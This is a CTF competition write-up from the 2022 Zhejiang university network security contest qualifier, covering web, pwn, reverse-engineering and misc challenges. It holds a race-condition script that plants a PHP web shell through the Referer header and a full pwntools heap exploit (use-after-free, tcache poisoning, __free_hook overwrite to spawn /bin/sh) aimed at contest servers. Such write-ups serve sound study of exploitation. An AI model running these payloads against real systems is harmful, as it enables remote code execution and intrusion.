第五届浙江省大学生网络与信息安全竞赛技能挑战赛(预赛)
date
Sep 17, 2022
slug
nisc2022-quals
status
Published
tags
CTF
WriteUP
summary
type
Post
- 名称:签个到我就跑Ⅱ
- 排名:5
Web
买买买01
条件竞争
import io
import sys
import threading
import requests
# Challenge instance used during the competition (presumably ephemeral;
# host and port are specific to this event and will not resolve later).
url = "http://1.14.97.218:26337"
def write(ses: requests.Session):
    """Worker: keep re-triggering the copy action with the payload in the Referer.

    Runs forever; its only job is to win the race described in the writeup
    ("条件竞争" above) against the reader threads. Presumably the server
    writes the Referer into the copied file — confirm against the challenge
    source. Shares one Session object with every other worker thread.
    """
    while True:
        header = {
            "Referer": """<?php system($_GET['a']); ?>"""
        }
        ses.get(f"{url}/index.php?action=copy", headers=header)
def read(ses: requests.Session):
    """Worker: poll the copied file and print the response body once it answers 200.

    NOTE(review): sys.exit() here only raises SystemExit inside this worker
    thread; the process and the other worker threads keep running. Non-200
    responses are ignored and the loop simply retries.
    """
    while True:
        aa = ses.get(f"{url}/78918a284cb4ebeb991381af708300a6/78918a284cb4ebeb991381af708300a6.txt2.php?a=cat /fla444444444444g")
        # Author's leftover debugging notes, condensed: one run of the copied
        # .txt2.php returned a PHP "Parse error: syntax error, unexpected ''
        # (T_ENCAPSED_AND_WHITESPACE)" on line 1, and an earlier probe used a
        # different directory hash (.../53447bd885dcf4c8c53ebc86f91b2964/test.php?a=ls).
        if aa.status_code == 200:
            print(aa.text)
            sys.exit()
if __name__ == '__main__':
    # Outer loop: on every pass create a fresh session and 40 worker threads.
    # NOTE(review): nothing ever breaks out of this loop and the threads are
    # never joined, so it keeps spawning threads until the process is killed;
    # a read() worker reaching sys.exit() only terminates its own thread.
    while True:
        e = threading.Event()  # set() below but never waited on — effectively unused
        s = requests.session()  # NOTE: one Session shared by all 40 threads
        header = {
            "Referer": """<?php system($_GET['a']); ?>"""
        }
        # Trigger the copy action once and show the raw response before racing.
        aa = s.get(f"{url}/index.php?action=copy", headers=header)
        print(aa.content)
        for i in range(20):
            threading.Thread(target=write, args=(s,)).start()
        for i in range(20):
            threading.Thread(target=read, args=(s,)).start()
        e.set()
nisc_easyweb
扫目录扫出.DS_Store文件,用010 Editor打开发现提示test_api,访问后F12有提示
test_api.php?i=FlagInHere 出flag
nisc_学校门户网站
账号:自己名字
密码:Nihao手机号前4位
吃豆人吃豆魂
f12 js包里找到base64的flag
PWN
babyheap
漏洞利用思路:利用delete方法的UAF构造tcache头,将tcache头对应大小的count改大,释放tcache头获得libc地址,再利用UAF修改fd,从而劫持__free_hook,然后构造system("/bin/sh")拿shell
EXP
from pwn import *
# Verbose pwntools I/O logging and the target architecture.
context.log_level = 'debug'
context.arch='amd64'
# Remote challenge instance (competition-time address), the local binary and
# the libc build the offsets below were taken from. `elf` is not referenced
# anywhere in the visible script.
io=remote("1.14.97.218",22080)
elf=ELF('./babyheap')
libc = ELF('./libc-2.27.so')
# Short aliases for the pwntools tube API.
rl = lambda a=False : io.recvline(a)
ru = lambda a,b=True : io.recvuntil(a,b)
rn = lambda x : io.recvn(x)
sn = lambda x : io.send(x)
sl = lambda x : io.sendline(x)
sa = lambda a,b : io.sendafter(a,b)
sla = lambda a,b : io.sendlineafter(a,b)
irt = lambda : io.interactive()
dbg = lambda text=None : gdb.attach(io, text)
# lg("name") logs the value of the *global* variable called `name` in hex.
# NOTE(review): eval() on the argument is unnecessary — globals()[s] would
# do — and is only acceptable because every caller passes a literal name.
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# Unpack short little-endian byte strings, zero-padding to the full width.
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))
def add(size):
    """Menu option 1: ask the binary for a chunk of ``size`` bytes."""
    io.recvuntil('input your choice:')
    io.sendline('1')
    io.recvuntil('input size:')
    io.sendline(str(int(size)))
def edit(index, content):
    """Menu option 2: write ``content`` into chunk ``index``.

    ``content`` is sent raw (no trailing newline), so callers control the
    exact bytes written.
    """
    io.recvuntil('input your choice:')
    io.sendline('2')
    io.recvuntil('input index:')
    io.sendline(str(int(index)))
    io.recvuntil('input content:')
    io.send(content)
def show(idx):
    """Menu option 3: have the binary print chunk ``idx``; the caller reads the output."""
    io.recvuntil('input your choice:')
    io.sendline('3')
    io.recvuntil('input index:')
    io.sendline(str(int(idx)))
def free(idx):
    """Menu option 4: free chunk ``idx``.

    Per the writeup, this delete path leaves the pointer usable afterwards
    (the UAF the exploit relies on) — confirm in the binary.
    """
    io.recvuntil('input your choice:')
    io.sendline('4')
    io.recvuntil('input index:')
    io.sendline(str(int(idx)))
def exit():
    """Menu option 5: quit the target program.

    NOTE(review): shadows the builtin ``exit()`` for the rest of this module.
    """
    io.recvuntil('input your choice:')
    io.sendline('5')
# --- Stage 1: heap leak through a freed (still readable) tcache chunk ------
add(0x70)  # idx 0
add(0x70)  # idx 1
free(0)
free(1)
# UAF: idx 1 is freed but show() still prints it; its first qword is the
# freelist pointer to chunk 0, from which the heap base is derived.
show(1)
io.recvline()
# NOTE(review): bytes.ljust() with a str fill ('\x00') raises TypeError on
# Python 3 — this script (also 'a'*0x40 and '/bin/sh\x00' below) assumes
# Python 2 pwntools.
heapbase=u64(io.recv(6).ljust(8,'\x00'))-0x260
lg("heapbase")
# --- Stage 2: libc leak via the tcache header (strategy described above) ---
# Point the freelist at heapbase+0x10 so the next-but-one allocation lands
# on the tcache header, then scribble over its count bytes so that freeing
# the header chunk bypasses tcache and exposes a libc pointer.
edit(1,p64(heapbase+0x10))
add(0x70)  # idx 2
add(0x70)  # idx 3 -> overlaps the tcache header
edit(3,p64(0)*2+'a'*0x40)
free(3)
show(3)
io.recvline()
# Offset recorded from a debugging session (leaked pointer minus libc base,
# presumably main_arena-relative); only valid for this exact libc build.
libcbase=u64(io.recv(6).ljust(8,'\x00'))-(0x7f9bb93e8ca0-0x7f9bb8ffd000)
lg("libcbase")
free_hook=libcbase+libc.sym['__free_hook']
system=libcbase+libc.sym['system']
# --- Stage 3: UAF on idx 1 again to redirect the freelist to __free_hook --
free(1)
edit(1,p64(free_hook))
add(0x70)#4
add(0x70)#5 -> overlaps __free_hook
edit(5,p64(system))
edit(4,'/bin/sh\x00')
free(4)  # free("/bin/sh") now calls system("/bin/sh")
#add(0x70)#6
#gdb.attach(io)
irt()
RE
ManyCheck
patch or 直接抄答案
77
55
49
1198089844
ezpy
pycdc dump
#include <iostream>
#include "defs.h"
#include <cstdint>
#include <cstdlib>
#include "aes/aes.h"
#include <stdio.h>
#include <stdint.h>
#define DELTA 0x4e253839
#define MX (((z>>6^y<<3) + (y>>3^z<<4)) ^ ((sum^y) + (key[(p&3)^e])))
/* Round constant of this challenge's XXTEA variant (standard XXTEA uses
 * 0x9E3779B9; the binary was patched to this value). */
static const uint32_t kDelta = 0x4e253839u;

/* The XXTEA mixing function: combines the two neighbouring words y and z with
 * the running sum and one key word selected by the position p and round
 * selector e. Equivalent to the MX macro form of the reference code. */
static inline uint32_t xxtea_mx(uint32_t y, uint32_t z, uint32_t sum,
                                unsigned p, unsigned e, uint32_t const key[4])
{
    uint32_t lhs = (z >> 6 ^ y << 3) + (y >> 3 ^ z << 4);
    uint32_t rhs = (sum ^ y) + key[(p & 3) ^ e];
    return lhs ^ rhs;
}

/*
 * XXTEA ("corrected block TEA") over an n-word block, in place.
 *   n >  1 : encrypt n words of v
 *   n < -1 : decrypt -n words of v
 *   otherwise the call is a no-op (a 1-word block cannot be processed).
 * key is the 128-bit key as four 32-bit words.
 */
void btea(uint32_t *v, int n, uint32_t const key[4])
{
    if (n > 1) {
        /* Encryption. */
        unsigned words = (unsigned)n;
        unsigned rounds = 6 + 52 / words;
        uint32_t sum = 0;
        uint32_t z = v[words - 1];
        for (unsigned r = 0; r < rounds; ++r) {
            sum += kDelta;
            unsigned e = (sum >> 2) & 3;
            unsigned p = 0;
            for (; p + 1 < words; ++p) {
                uint32_t y = v[p + 1];
                v[p] += xxtea_mx(y, z, sum, p, e, key);
                z = v[p];
            }
            /* p == words - 1 here: the last word mixes with the first. */
            uint32_t y = v[0];
            v[p] += xxtea_mx(y, z, sum, p, e, key);
            z = v[p];
        }
    } else if (n < -1) {
        /* Decryption: same schedule, walked backwards. */
        unsigned words = (unsigned)(-n);
        unsigned rounds = 6 + 52 / words;
        uint32_t sum = rounds * kDelta;
        uint32_t y = v[0];
        for (unsigned r = 0; r < rounds; ++r) {
            unsigned e = (sum >> 2) & 3;
            for (unsigned p = words - 1; p > 0; --p) {
                uint32_t z = v[p - 1];
                v[p] -= xxtea_mx(y, z, sum, p, e, key);
                y = v[p];
            }
            /* Position 0 mixes with the last word. */
            uint32_t z = v[words - 1];
            v[0] -= xxtea_mx(y, z, sum, 0, e, key);
            y = v[0];
            sum -= kDelta;
        }
    }
}
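/*
 * Decrypts the challenge ciphertext (four independently encrypted 64-bit
 * pairs) and prints the plaintext words in hex followed by the raw bytes.
 */
int main()
{
    uint32_t in[8] = {722695011, 893015348, 4216872997, 752171035, 1118151735, 2439687534, 3287721558, 2749371631};
    uint32_t key[] = {4, 3, 2, 1};
    char *in8 = reinterpret_cast<char *>(in);  /* byte view of the plaintext */

    /* Each pair of words was encrypted on its own (n = 2), so decrypt pairwise. */
    for (int i = 0; i < 4; ++i) {
        btea(in + 2 * i, -2, key);
    }
    for (int i = 0; i < 8; ++i) {
        printf("0x%08X, ", (unsigned)in[i]);
    }
    printf("\n");
    /* The 32 plaintext bytes carry no NUL terminator; bound the %s to the
     * buffer size instead of letting printf read past the end of `in`. */
    printf("%.*s\n", (int)sizeof(in), in8);
    return 0;
}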
大小端转换
from utils.convert import DWORDList, Config, DWORD, DWORD2BYTEs, BYTEList, ROL
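Config.print_type("hex")
# Plaintext words as printed by the C++ decryptor above. printf("%s") on the
# buffer came out byte-swapped, so each DWORD is reversed into big-endian
# byte order here and the flat byte list is printed.
words = [0x78787433, 0x3434345F, 0x316E5F70, 0x79746833, 0x6E5F3173, 0x5F653373, 0x795F7231, 0x6768743F]
ss = DWORDList(words)
a = []
for i in range(len(words)):
    a += DWORD2BYTEs(ss[i])[::-1]  # four bytes per word, reversed
print(BYTEList(a).toByteArray())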
Crypto
None
MISC
好怪哦
压缩包反转
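# The archive was stored back-to-front: reverse the whole file byte-wise.
# Context managers close both handles even if the write fails.
src = r"D:\CTF\Reverse\zjctf2022\fuck.zip"
dst = r"D:\CTF\Reverse\zjctf2022\fuck.fuck.zip"
with open(src, "rb") as fin:
    aa = fin.read()
with open(dst, "wb") as fout:
    fout.write(aa[::-1])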
添加PNG头
修改宽高
神奇的棋盘
看到dong.txt内是由1-5组成的两位数字,逗号分割,hint提示棋盘,即棋盘密码,将其转换为ADFGVX格式:
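# Two-digit Polybius coordinates found in dong.txt -> ADFGVX symbols.
# Only the six pairs the author observed are mapped; any other token is
# skipped silently, as in the original if-chain.
COORD_TO_ADFGVX = {
    b'11': 'A',
    b'14': 'D',
    b'21': 'F',
    b'22': 'G',
    b'51': 'V',
    b'53': 'X',
}


def polybius_to_adfgvx(raw: bytes) -> str:
    """Translate comma-separated coordinate pairs to an ADFGVX string.

    Whitespace around a pair (e.g. a trailing newline on the last token) is
    ignored; pairs missing from ``COORD_TO_ADFGVX`` contribute nothing.
    """
    return ''.join(
        COORD_TO_ADFGVX.get(token.strip(), '') for token in raw.split(b",")
    )


if __name__ == '__main__':
    path = r'C:\Users\lifestyle\Desktop\MISC附件\file\dong.txt'
    with open(path, 'rb') as f:
        data = f.read()
    # The original printed one symbol at a time with end=''; keep the same output.
    print(polybius_to_adfgvx(data), end='')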
# 6x6 ADFGVX Polybius square used for the decryption step described below.
# Kept for reference only — nothing in this script indexes it.
table=[['P','H','O','Q','G','6'],
       ['4','M','E','A','1','Y'],
       ['L','2','N','O','F','D'],
       ['X','K','R','3','C','V'],
       ['S','5','Z','W','7','B'],
       ['J','9','U','T','I','8']
       ]
AGAXXDAGGVGGVDVADAVXDGADVGDVAADDDDFXAFAFDGDVXXDGGDGGDXDDFDDXVGXADGVDFXVVAADDXDXXADDVGGGXGXXXXGXXGGXGDVVVGGGAGAAAAGAAGGAGDDDAGAGGGAGGAGAGAAAVAAAXGXGGGXGGXGXGXXXV
然后要解密还需要一个key,从图片里提取到一串base64
base32解密后得到
然后adfgvx-cipher密码解密得到16进制
4441534354467b64383539633431633533306166633163316164393461626439326634626166387d
最后:16进制串转为字符串
import binascii
# Hex-encoded flag recovered from the ADFGVX step above.
hexstring = "4441534354467b64383539633431633533306166633163316164393461626439326634626166387d"
# bytes.fromhex() is the stdlib equivalent of binascii.unhexlify() for a str.
flag_bytes = bytes.fromhex(hexstring)
print(flag_bytes.decode(encoding="utf-8"))